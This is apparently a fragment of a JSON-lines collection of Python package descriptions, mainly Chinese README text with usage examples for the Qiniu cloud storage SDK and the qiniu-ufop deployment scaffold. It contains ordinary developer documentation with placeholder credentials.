name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600))uploader=upload_manager.auto_uploader()uploader.upload_path('/home/qiniu/test.png',object_name=object_name,file_name=object_name)\u5728\u8fd9\u4e2a\u573a\u666f\u4e0b\uff0cAutoUploader\u4f1a\u81ea\u52a8\u6839\u636e\u6587\u4ef6\u5c3a\u5bf8\u5224\u5b9a\u662f\u5426\u542f\u7528\u65ad\u70b9\u7eed\u4e0a\u4f20\uff0c\u5982\u679c\u6587\u4ef6\u8f83\u5927\uff0c\u4e0a\u4f20\u4e86\u4e00\u90e8\u5206\u65f6\u56e0\u5404\u79cd\u539f\u56e0\u4ece\u800c\u4e2d\u65ad\uff0c\u518d\u91cd\u65b0\u6267\u884c\u76f8\u540c\u7684\u4ee3\u7801\u65f6\uff0cSDK \u4f1a\u5c1d\u8bd5\u627e\u5230\u5148\u524d\u6ca1\u6709\u5b8c\u6210\u7684\u4e0a\u4f20\u4efb\u52a1\uff0c\u4ece\u800c\u7ee7\u7eed\u8fdb\u884c\u4e0a\u4f20\u3002\u5b57\u8282\u6570\u7ec4\u4e0a\u4f20 / \u6570\u636e\u6d41\u4e0a\u4f20\u53ef\u4ee5\u652f\u6301\u5c06\u5185\u5b58\u4e2d\u7684\u5b57\u8282\u6570\u7ec4\u6216\u5b9e\u73b0\u4e86read\u65b9\u6cd5\u7684\u5b9e\u4f8b\u4e0a\u4f20\u5230\u7a7a\u95f4\u4e2d\u3002fromqiniu_sdk_alphaimportupload,credentialimportioaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600))uploader=upload_manager.auto_uploader()uploader.upload_reader(io.BytesIO(b'hello qiniu cloud'),object_name=object_name,file_name=object_name)\u81ea\u5b9a\u4e49\u53c2\u6570\u4e0a\u4f20fromqiniu_sdk_alphaimportupload,credentialdefon_policy_generated(builder):builder.return_body='{\"key\":\"$(key)\",\"hash\":\"$(etag)\",\"fname\":\"$(x:fname)\",\"age\":$(x:age)}'access_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object 
name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600,on_policy_generated=on_policy_generated))uploader=upload_manager.auto_uploader()uploader.upload_path('/home/qiniu/test.png',object_name=object_name,file_name=object_name,custom_vars={'fname':'123.jpg','age':'20'})\u79c1\u6709\u4e91\u4e0a\u4f20fromqiniu_sdk_alphaimportupload,credential,http_clientaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)upload_manager=upload.UploadManager(upload.UploadTokenSigner.new_credential_provider(cred,bucket_name,3600),uc_endpoints=http_client.Endpoints(['ucpub-qos.pocdemo.qiniu.io']))uploader=upload_manager.auto_uploader()uploader.upload_path('/home/qiniu/test.png',object_name=object_name,file_name=object_name)\u4e0b\u8f7d\u6587\u4ef6\u6587\u4ef6\u4e0b\u8f7d\u5206\u4e3a\u516c\u5f00\u7a7a\u95f4\u7684\u6587\u4ef6\u4e0b\u8f7d\u548c\u79c1\u6709\u7a7a\u95f4\u7684\u6587\u4ef6\u4e0b\u8f7d\u3002\u516c\u5f00\u7a7a\u95f4fromqiniu_sdk_alphaimportdownloadobject_name='\u516c\u53f8/\u5b58\u50a8/qiniu.jpg'domain='devtools.qiniu.com'path='/home/user/qiniu.jpg'download_manager=download.DownloadManager(download.StaticDomainsUrlsGenerator([domain],use_https=False))# \u8bbe\u7f6e\u4e3a HTTP \u534f\u8baedownload_manager.download_to_path(object_name,path)\u79c1\u6709\u7a7a\u95f4fromqiniu_sdk_alphaimportdownload,credentialobject_name='\u516c\u53f8/\u5b58\u50a8/qiniu.jpg'domain='devtools.qiniu.com'path='/home/user/qiniu.jpg'access_key='access key'secret_key='secret key'cred=credential.Credential(access_key,secret_key)download_manager=download.DownloadManager(download.UrlsSigner(cred,download.StaticDomainsUrlsGenerator([domain],use_https=False)))# \u8bbe\u7f6e\u4e3a HTTP \u534f\u8baedownload_manager.download_to_path(object_name,path)\u8d44\u6e90\u7ba1\u7406\u83b7\u53d6\u6587\u4ef6\u4fe1\u606ffromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)response=bucket.stat_object(object_name).call()print(response['hash'])print(response['fsize'])print(response['mimeType'])print(response['putTime'])\u4fee\u6539\u6587\u4ef6\u7c7b\u578bfromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.modify_object_metadata(object_name,'application/json').call()\u79fb\u52a8\u6216\u91cd\u547d\u540d\u6587\u4ef6\u79fb\u52a8\u64cd\u4f5c\u672c\u8eab\u652f\u6301\u79fb\u52a8\u6587\u4ef6\u5230\u76f8\u540c\uff0c\u4e0d\u540c\u7a7a\u95f4\u4e2d\uff0c\u5728\u79fb\u52a8\u7684\u540c\u65f6\u4e5f\u53ef\u4ee5\u652f\u6301\u6587\u4ef6\u91cd\u547d\u540d\u3002\u552f\u4e00\u7684\u9650\u5236\u6761\u4ef6\u662f\uff0c\u79fb\u52a8\u7684\u6e90\u7a7a\u95f4\u548c\u76ee\u6807\u7a7a\u95f4\u5fc5\u987b\u5728\u540c\u4e00\u4e2a\u673a\u623f\u3002fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'to_bucket_name='to bucket name\"to_object_name=\"new object 
name\"cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.move_object_to(object_name,to_bucket_name,to_object_name).call()\u590d\u5236\u6587\u4ef6\u526f\u672c\u6587\u4ef6\u7684\u590d\u5236\u548c\u6587\u4ef6\u79fb\u52a8\u5176\u5b9e\u64cd\u4f5c\u4e00\u6837\uff0c\u4e3b\u8981\u7684\u533a\u522b\u662f\u79fb\u52a8\u540e\u6e90\u6587\u4ef6\u4e0d\u5b58\u5728\u4e86\uff0c\u800c\u590d\u5236\u7684\u7ed3\u679c\u662f\u6e90\u6587\u4ef6\u8fd8\u5b58\u5728\uff0c\u53ea\u662f\u591a\u4e86\u4e00\u4e2a\u65b0\u7684\u6587\u4ef6\u526f\u672c\u3002fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'to_bucket_name=\"to bucket name\"to_object_name=\"new object name\"cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.copy_object_to(object_name,to_bucket_name,to_object_name).call()\u5220\u9664\u7a7a\u95f4\u4e2d\u7684\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.delete_object(object_name).call()\u8bbe\u7f6e\u6216\u66f4\u65b0\u6587\u4ef6\u7684\u751f\u5b58\u65f6\u95f4\u53ef\u4ee5\u7ed9\u5df2\u7ecf\u5b58\u5728\u4e8e\u7a7a\u95f4\u4e2d\u7684\u6587\u4ef6\u8bbe\u7f6e\u6587\u4ef6\u751f\u5b58\u65f6\u95f4\uff0c\u6216\u8005\u66f4\u65b0\u5df2\u8bbe\u7f6e\u4e86\u751f\u5b58\u65f6\u95f4\u4f46\u5c1a\u672a\u88ab\u5220\u9664\u7684\u6587\u4ef6\u7684\u65b0\u7684\u751f\u5b58\u65f6\u95f4\u3002fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'object_name='object name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)bucket.modify_object_life_cycle(object_name,delete_after_days=10).call()\u83b7\u53d6\u7a7a\u95f4\u6587\u4ef6\u5217\u8868fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forobjinbucket.list():print('%s\\nhash:%s\\nsize:%d\\nmime type:%s'%(obj['key'],obj['hash'],obj['fsize'],obj['mimeType']))\u79c1\u6709\u4e91\u4e2d\u83b7\u53d6\u7a7a\u95f4\u6587\u4ef6\u5217\u8868fromqiniu_sdk_alphaimportobjects,credential,http_clientaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred,uc_endpoints=http_client.Endpoints(['ucpub-qos.pocdemo.qiniu.io']),use_https=False).bucket(bucket_name)# \u79c1\u6709\u4e91\u666e\u904d\u4f7f\u7528 HTTP \u534f\u8bae\uff0c\u800c SDK \u5219\u9ed8\u8ba4\u4e3a HTTPS \u534f\u8baeforobjinbucket.list():print('%s\\nhash:%s\\nsize:%d\\nmime type:%s'%(obj['key'],obj['hash'],obj['fsize'],obj['mimeType']))\u8d44\u6e90\u7ba1\u7406\u6279\u91cf\u64cd\u4f5c\u6279\u91cf\u83b7\u53d6\u6587\u4ef6\u4fe1\u606ffromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.stat_object('qiniu.jpg'),bucket.stat_object('qiniu.mp4'),bucket.stat_object('qiniu.png'),]):ifresult.error:print('error:%s'%result.error)else:print('hash:%s\\nsize:%d\\nmime 
type:%s'%(result.data['hash'],result.data['fsize'],result.data['mimeType']))\u6279\u91cf\u4fee\u6539\u6587\u4ef6\u7c7b\u578bfromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.modify_object_metadata('qiniu.jpg','image/jpeg'),bucket.modify_object_metadata('qiniu.mp4','image/png'),bucket.modify_object_metadata('qiniu.png','video/mp4'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u5220\u9664\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.delete_object('qiniu.jpg'),bucket.delete_object('qiniu.mp4'),bucket.delete_object('qiniu.png'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u79fb\u52a8\u6216\u91cd\u547d\u540d\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.move_object_to('qiniu.jpg',bucket_name,'qiniu.jpg.move'),bucket.move_object_to('qiniu.mp4',bucket_name,'qiniu.mp4.move'),bucket.move_object_to('qiniu.png',bucket_name,'qiniu.png.move'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u590d\u5236\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.copy_object_to('qiniu.jpg',bucket_name,'qiniu.jpg.move'),bucket.copy_object_to('qiniu.mp4',bucket_name,'qiniu.mp4.move'),bucket.copy_object_to('qiniu.png',bucket_name,'qiniu.png.move'),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6279\u91cf\u89e3\u51bb\u5f52\u6863\u5b58\u50a8\u7c7b\u578b\u6587\u4ef6fromqiniu_sdk_alphaimportobjects,credentialaccess_key='access key'secret_key='secret key'bucket_name='bucket name'cred=credential.Credential(access_key,secret_key)bucket=objects.ObjectsManager(cred).bucket(bucket_name)forresultinbucket.batch_ops([bucket.restore_archived_object('qiniu.jpg',7),bucket.restore_archived_object('qiniu.mp4',7),bucket.restore_archived_object('qiniu.png',7),]):ifresult.error:print('error:%s'%result.error)else:print('ok')\u6700\u4f4e\u652f\u6301\u7684 Python \u7248\u672c\uff08MSPV\uff093.8.0\u6700\u4f4e\u652f\u6301\u7684 Rust \u7248\u672c\uff08MSRV\uff091.60.0\u7f16\u7801\u89c4\u8303\u901a\u8fc7cargo 
clippy\u68c0\u67e5\uff0c\u5e76\u7ecf\u8fc7rustfmt\u683c\u5f0f\u5316\u3002\u6240\u6709\u516c\u5f00\u63a5\u53e3\u90fd\u9700\u8981\u6587\u6863\u6ce8\u91ca\u3002\u6240\u6709\u963b\u585e\u64cd\u4f5c\u90fd\u63d0\u4f9b\u5f02\u6b65\u65e0\u963b\u585e\u7248\u672c\u3002\u5c3d\u53ef\u80fd\u4fdd\u8bc1\u4ec5\u4f7f\u7528\u5b89\u5168\u7684\u4ee3\u7801\u3002\u8054\u7cfb\u6211\u4eec\u5982\u679c\u9700\u8981\u5e2e\u52a9\uff0c\u8bf7\u63d0\u4ea4\u5de5\u5355\uff08\u5728portal\u53f3\u4fa7\u70b9\u51fb\u54a8\u8be2\u548c\u5efa\u8bae\u63d0\u4ea4\u5de5\u5355\uff0c\u6216\u8005\u76f4\u63a5\u5411support@qiniu.com\u53d1\u9001\u90ae\u4ef6\uff09\u5982\u679c\u6709\u4ec0\u4e48\u95ee\u9898\uff0c\u53ef\u4ee5\u5230\u95ee\u7b54\u793e\u533a\u63d0\u95ee\uff0c\u95ee\u7b54\u793e\u533a\u66f4\u8be6\u7ec6\u7684\u6587\u6863\uff0c\u89c1\u5b98\u65b9\u6587\u6863\u7ad9\u5982\u679c\u53d1\u73b0\u4e86bug\uff0c \u6b22\u8fce\u63d0\u4ea4Issue\u5982\u679c\u6709\u529f\u80fd\u9700\u6c42\uff0c\u6b22\u8fce\u63d0\u4ea4Issue\u5982\u679c\u8981\u63d0\u4ea4\u4ee3\u7801\uff0c\u6b22\u8fce\u63d0\u4ea4Pull Request\u6b22\u8fce\u5173\u6ce8\u6211\u4eec\u7684\u5fae\u4fe1\u5fae\u535a\uff0c\u53ca\u65f6\u83b7\u53d6\u52a8\u6001\u4fe1\u606f\u3002\u4ee3\u7801\u8bb8\u53efThis project is licensed under theMIT license."} +{"package": "qiniu-storage", "pacakge-description": "Django storage power by qiniu store"} +{"package": "qiniu-ufop", "pacakge-description": "Qiniu-ufop\u672c\u9879\u76ee\u63d0\u4f9b\u4e00\u4e2a\u4fbf\u6377\u9ad8\u6027\u80fd\u7684\u4e03\u725b\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u811a\u624b\u67b6,\u4ee5\u4fbf\u5f00\u53d1\u4eba\u5458\u4e13\u6ce8\u6570\u636e\u5904\u7406\u4e1a\u52a1\u903b\u8f91.\u76ee\u524d\u5c1a\u672a\u7f16\u5199\u5355\u5143\u6d4b\u8bd5,\u4e5f\u6ca1\u6709\u5b8c\u5584\u7684\u5f02\u5e38\u5904\u7406\u673a\u5236.\u91c7\u7528Python 3.6\u8fdb\u884c\u5f00\u53d1,\u4e0d\u786e\u4fdd\u5176\u4ed6\u7248\u672c\u8fd0\u884c\u6b63\u5e38.\u9879\u76ee\u5b98\u65b9\u7ad9\u70b9https://github.com/Xavier-Lam/qiniu-ufopQuickstart\u5b89\u88c5\u5f00\u59cb\u9879\u76ee\u7f16\u5199\u4e1a\u52a1\u4ee3\u7801\u672c\u5730\u8fd0\u884c\u9879\u76ee\u751f\u6210Dockerfile\u5e76\u53d1\u5e03\u6fc0\u6d3b\u6ce8\u610f\u5f00\u53d1\u4f7f\u7528\u547d\u4ee4\u884c\u5de5\u5177\u4e00\u952e\u90e8\u7f72\u624b\u5de5\u90e8\u7f72\u751f\u6210\u955c\u50cf\u4e0a\u8f7d\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f\u914d\u7f6e\u8c03\u8bd5\u672c\u5730\u8c03\u8bd5\u5904\u7406\u7a0b\u5e8f\u672c\u5730\u8c03\u8bd5webserver\u672c\u5730\u8c03\u8bd5Docker\u95ee\u9898\u6392\u67e5\u65e5\u5fd7\u67e5\u770b\u90e8\u7f72\u8fc7\u7a0b\u4e2d\u9047\u5230\u7684\u5f02\u5e38Cookbook\u4f7f\u7528git\u66f4\u65b0\u4ee3\u7801TODOS:Quickstart\u5b89\u88c5\u901a\u8fc7pip\u5b89\u88c5\u9879\u76eepip install qiniu-ufop\u5f00\u59cb\u9879\u76ee\u4f7f\u7528qiniu-ufop\u547d\u4ee4,\u5feb\u901f\u751f\u6210\u9879\u76eeqiniu-ufop createproject\u901a\u8fc7createproject\u547d\u4ee4,qiniu-ufop\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u751f\u6210\u4e86\u4e00\u4e2aapp.py\u6587\u4ef6.\u7f16\u5199\u4e1a\u52a1\u4ee3\u7801\u4ee5\u4e0b\u662f\u4e00\u4e2a\u7b80\u5355\u793a\u4f8b:# app.py\n\nfrom qiniu_ufop import QiniuUFOP\n\nufop = QiniuUFOP()\n\n@ufop.task(route=r\"^(?:/(?P\\w+))?$\")\ndef debug(buffer, args, content_type):\n return \"hello \" + args.get(\"name\", \"world\")\u5047\u8bbe\u8be5\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u540d\u79f0\u4e3aqiniu,\u5f85\u5904\u7406\u7684\u6587\u4ef6\u94fe\u63a5\u4e3ahttps://qbox.me/example.jpg. 
\u5219\u8c03\u7528\u94fe\u63a5\u662fhttps://qbox.me/example.jpg?qiniu/qq*,\u54cd\u5e94\u8f93\u51fa\u4e3a*helloqq\u7f16\u5199\u8bf4\u660e\u53c2\u89c1\u5f00\u53d1\u7ae0\u8282\u672c\u5730\u8fd0\u884c\u9879\u76eeqiniu-ufop runserver --debug\nqiniu-ufop runworker\u6ce8\u610f: \u5728windows\u4e0b\u5f00\u53d1\u9700\u989d\u5916\u5b89\u88c5eventlet,\u8fd0\u884crunworker\u65f6\u4f7f\u7528\u547d\u4ee4qiniu-ufop runworker -P eventlet\u8be6\u89c1\u8c03\u8bd5\u7ae0\u8282\u751f\u6210Dockerfile\u5e76\u53d1\u5e03qiniu-ufop deploy -t -n -v \u8be5\u547d\u4ee4\u4e3a\u4e00\u952e\u90e8\u7f72\u547d\u4ee4,\u4e00\u952e\u90e8\u7f72\u9700\u6ee1\u8db3\u76f8\u5173\u6761\u4ef6,\u8bf7\u53c2\u9605\u4e00\u952e\u90e8\u7f72\u7ae0\u8282.\u5982\u9700\u5b9a\u5236\u5316\u90e8\u7f72,\u53ef\u53c2\u89c1\u624b\u5de5\u90e8\u7f72\u7ae0\u8282\u6fc0\u6d3b\u5728\u4f60\u7684\u81ea\u5b9a\u4e49\u5904\u7406\u7684\u7248\u672c\u5217\u8868\u4e2d\u8c03\u6574\u5b9e\u4f8b\u6570,\u5373\u53ef\u4f7f\u7528\u6ce8\u610f\u4e03\u725b\u6709\u4e00\u4e2aBUG,\u5728\u4ee3\u7801\u4e2d\u6ca1\u529e\u6cd5\u53d6\u5230\u6b63\u786e\u7684cpu\u6838\u6570\u4f7f\u7528\u4e00\u952e\u90e8\u7f72,\u6846\u67b6\u4f1a\u53d6\u4e00\u952e\u90e8\u7f72\u7684\u914d\u7f6e\u9879flavor(\u5b9e\u4f8b\u7c7b\u578b,\u9ed8\u8ba4C1M1)\u4f5c\u4e3aCPU\u6838\u6570,\u5f00\u542f\u76f8\u5e94\u6570\u91cf\u7684worker\u53caweb\u81ea\u884c\u90e8\u7f72\u65f6,\u8bf7\u52a1\u5fc5\u5728\u73af\u5883\u53d8\u91cf(\u5f00\u53d1\u8def\u5f84\u4e0b\u7684.env\u6587\u4ef6)\u4e2d\u5199\u5165CPU\u6838\u6570CPU_COUNT\u6216\u5b9e\u4f8b\u914d\u7f6eFLAVOR,\u624d\u80fd\u5f00\u542f\u6b63\u786e\u6570\u91cf\u7684worker\u53caweb,\u5426\u5219,qiniu-ufop\u5c06\u9ed8\u8ba4\u53d6\u5355\u6838,\u4e5f\u5c31\u662f\u5355\u5b9e\u4f8b\u8fd0\u884cweb\u53caworker\u5f00\u53d1\u6570\u636e\u5904\u7406\u5668\u5b9e\u9645\u4e0a\u662f\u4e00\u4e2acelery\u4efb\u52a1,\u8fd9\u4e2a\u4efb\u52a1\u5fc5\u987b\u63a5\u53d7\u4e00\u4e2aroute\u53c2\u6570,\u6307\u660e\u4f1a\u8def\u7531\u5230\u8be5\u5904\u7406\u5668\u7684cmd,\u5982\u679c\u5168\u5c40\u53ea\u6709\u4e00\u4e2a\u5904\u7406\u5668,\u53ef\u4ee5\u4f7f\u7528.*\u6216^$\u4f5c\u4e3a\u8def\u7531.\u7406\u8bba\u4e0a\u53ef\u4ee5\u4f7f\u7528celery\u590d\u6742\u7684\u4efb\u52a1\u5206\u53d1.\u88ab\u88c5\u9970\u7684\u5904\u7406\u8d77\u63a5\u53d7\u4e09\u4e2a\u53c2\u6570,\u7b2c\u4e00\u4e2a\u662f\u5f85\u5904\u7406\u6587\u4ef6\u7684io.BytesIO,\u7b2c\u4e8c\u4e2a\u662f\u8def\u7531\u5339\u914d\u5230\u7684\u53c2\u6570\u5b57\u5178,\u7b2c\u4e09\u4e2a\u662f\u6587\u4ef6\u7684Content-Type.\u5904\u7406\u5668\u8fd4\u56de\u5b57\u7b26\u4e32,bytes,json\u6216\u662f\u4e00\u4e2aqiniu_ufop.Response\u5bf9\u8c61.\u65e5\u5fd7\u53ef\u76f4\u63a5\u8f93\u51fastderr.\u4f7f\u7528\u547d\u4ee4\u884c\u5de5\u5177\u53ef\u901a\u8fc7qiniu-ufop -h\u770b\u5230\u8be6\u7ec6\u8bf4\u660e\u4e00\u952e\u90e8\u7f72\u4e00\u952e\u90e8\u7f72\u5047\u8bbe\u7528\u6237\u672c\u5730\u5b89\u88c5\u6709docker\u73af\u5883\u5df2\u5b89\u88c5\u5e76\u767b\u9646qdoractl,qdoractl\u5728PATH\u4e2d\u5df2\u6ce8\u518c\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8fqiniu-ufop deploy -t -n -v \u624b\u5de5\u90e8\u7f72\u5b98\u65b9\u6587\u6863\u6b64\u7ae0\u8282\u5047\u5b9a\u7528\u6237\u5df2\u5b8c\u6210\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u7a0b\u5e8f\u7684\u5f00\u53d1,\u672c\u5730\u5b89\u88c5\u6709docker\u73af\u5883,\u5e76\u5904\u5728\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f\u76ee\u5f55\u4e0b\u751f\u6210\u955c\u50cf\u6784\u5efadocker\u955c\u50cfdocker build . 
-t \u4e0a\u8f7d\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f\u4e0b\u8f7d\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u547d\u4ee4\u884c\u5de5\u5177\u4f7f\u7528accesskey\u53casecretkey\u767b\u9646qdoractl login -u \u5982\u679c\u4f60\u5c1a\u672a\u521b\u5efa\u4f60\u7684\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8f,\u8bf7\u521b\u5efaqdoractl register [-d ]\u4e0a\u8f7d\u81ea\u5b9a\u4e49\u5904\u7406\u7a0b\u5e8fqdoractl push \u914d\u7f6e\u5b98\u65b9\u6587\u6863\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u540e\u53f0\u5176\u4ed6\u4f9d\u7167\u5b98\u65b9\u6587\u6863\u914d\u7f6e,\u5728\u9ad8\u7ea7\u914d\u7f6e\u4e2d\u5065\u5eb7\u914d\u7f6ePath\u8bf7\u586b\u5199/health\u65e5\u5fd7\u8def\u5f84\u6dfb\u52a0\u4efb\u52a1\u5904\u7406\u5f02\u5e38\u65e5\u5fd7/var/log/worker/web\u5904\u7406\u5f02\u5e38\u65e5\u5fd7/var/log/server/supervisor\u65e5\u5fd7/var/log/supervisor/\u8c03\u8bd5\u672c\u5730\u8c03\u8bd5\u5904\u7406\u7a0b\u5e8f\u53ef\u901a\u8fc7qiniu-ufop\u5bf9\u5904\u7406\u7a0b\u5e8f\u8fdb\u884c\u8c03\u8bd5qiniu-ufop process [] \u6ce8\u610f:\u6b64\u5904\u7684cmd\u662f\u4e0d\u5305\u62ec\u5904\u7406\u7a0b\u5e8f\u540d\u7684\u547d\u4ee4\u7684\u7ed3\u679c\u5c06\u76f4\u63a5\u6253\u5370\u518d\u63a7\u5236\u53f0\u4e0a,\u5982\u9700\u6301\u4e45\u5316,\u53ef\u4f7f\u7528output\u53c2\u6570,\u4f8b\u5982qiniu-ufop process test.png -o output.png\u672c\u5730\u8c03\u8bd5webserver\u542f\u52a8\u670d\u52a1\u5668\u53caworkerqiniu-ufop runserver --debug\nqiniu-ufop runworker\u8bbf\u95eePOSThttp://localhost:9100/handler?cmd=\\&url=\u6216\u5c06\u6587\u4ef6\u4f5c\u4e3abody,POST\u5230POSThttp://localhost:9100/handler?cmd=\\\u6ce8\u610f: \u4e0d\u662f\u4f7f\u7528multipart/formdata\u8fdb\u884c\u6587\u4ef6\u4e0a\u4f20\u6ce8\u610f: \u5728windows\u4e0b\u5f00\u53d1\u9700\u989d\u5916\u5b89\u88c5eventlet,\u8fd0\u884crunworker\u65f6\u4f7f\u7528\u547d\u4ee4qiniu-ufop runworker -P eventlet\u5426\u5219\u4f1a\u62a5ValueError: not enough values to unpack (expected 3, got 0)\u672c\u5730\u8c03\u8bd5Docker\u5728\u9879\u76ee\u76ee\u5f55\u4e0bqiniu-ufop dockerfile > Dockerfile\ndocker pull ubuntu:18.04\ndocker build . 
-t \ndocker run --name -p 9100:9100 -t \u8bbf\u95eePOSThttp://localhost:9100/handler?cmd=\\\u6ce8\u610f: \u5728\u4f7f\u7528virtualbox\u65f6 localhost\u5e94\u6539\u4e3a\u865a\u62df\u673aip\u95ee\u9898\u6392\u67e5\u65e5\u5fd7\u67e5\u770b\u4e03\u725b\u7684\u65e5\u5fd7\u67e5\u770b\u597d\u50cf\u7ecf\u5e38\u53d6\u4e0d\u5230\u65e5\u5fd7,\u5efa\u8bae\u81ea\u884c\u5728\u5904\u7406\u7a0b\u5e8f\u4e2d\u57cb\u4e00\u4e2a\u4e0b\u8f7d\u65e5\u5fd7\u7684\u65b9\u6cd5,\u6765\u83b7\u53d6\u65e5\u5fd7.\u53ef\u4ee5\u53c2\u770b\u793a\u4f8b\u9879\u76ee\u90e8\u7f72\u8fc7\u7a0b\u4e2d\u9047\u5230\u7684\u5f02\u5e38\u5728\u8fd0\u884cqdoractl push\u65f6,\u53ef\u80fd\u4f1a\u9047\u5230\u8be5\u5f02\u5e38,\u53cd\u6b63\u6211\u662f\u9047\u5230\u4e86Get http://192.168.99.100:2376/v1.20/version: net/http: HTTP/1.x transport connection broken: malformed HTTP response \"\\x15\\x03\\x01\\x00\\x02\\x02\".\n\n* Are you trying to connect to a TLS-enabled daemon without TLS?\u9047\u5230\u4e0a\u8ff0\u5f02\u5e38,\u9996\u5148\u767b\u9646docker\u5bbf\u4e3b\u673adocker-machine ssh\u4fee\u6539docker\u914d\u7f6e,\u8bbe\u7f6eDOCKER_TLS=nosudo vi /var/lib/boot2docker/profile\u91cd\u542fdocker\u670d\u52a1sudo /etc/init.d/docker restart\u9000\u51fadocker\u5bbf\u4e3b\u673aexitunset\u672c\u673a\u73af\u5883\u53d8\u91cfDOCKER_TLS_VERIFY(\u4ee5windows\u4e3a\u4f8b)set DOCKER_TLS_VERIFY=\u518d\u5ea6\u6267\u884c\u90e8\u7f72(\u53c2\u89c1\u624b\u5de5\u90e8\u7f72\u6216\u4e00\u952e\u90e8\u7f72)Cookbook\u4f7f\u7528git\u66f4\u65b0\u4ee3\u7801\u5728\u5de5\u4f5c\u8def\u5f84\u4e0b,\u751f\u6210ssh-keymd .ssh\n ssh-keygen -f ./.ssh/id_rsa -t rsa -N ''\u5c06\u751f\u6210\u7684 ./.ssh/id_rsa.pub \u52a0\u5165git\u4ed3\u5e93\u7684\u90e8\u7f72\u5bc6\u94a5\u4e2d\u4fee\u6539Dockerfile,\u5728cmd\u524d\u52a0\u5165RUN apt-get install git\n ADD ./.ssh /root/.ssh\n RUN chmod 400 /root/.ssh/id_rsa\n RUN ssh-keyscan github.com >> /root/.ssh/known_hosts\n RUN git clone your@repository\u4fee\u6539script.shgit pull origin master\u6ce8\u610f: 